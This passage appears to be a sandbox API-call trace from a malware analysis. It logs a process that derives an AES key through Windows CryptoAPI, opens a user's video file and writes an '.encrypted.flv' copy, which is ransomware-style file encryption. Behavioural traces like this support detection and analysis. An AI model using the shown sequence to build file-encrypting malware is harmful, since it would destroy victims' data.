ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x44757480, ftLastWriteTime.dwHighDateTime=0x1d5c4c4, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0x7c2240 [0042.004] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.004] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.004] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.004] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.004] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.004] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.004] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.004] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.005] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.005] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.005] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.006] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.007] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.007] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.007] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.008] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.008] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.008] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.008] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.008] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.008] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.009] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.009] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.010] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0042.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\-23zp4gcog gf3iwx.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.011] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.011] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.013] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\-23zp4gcog gf3iwx.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: 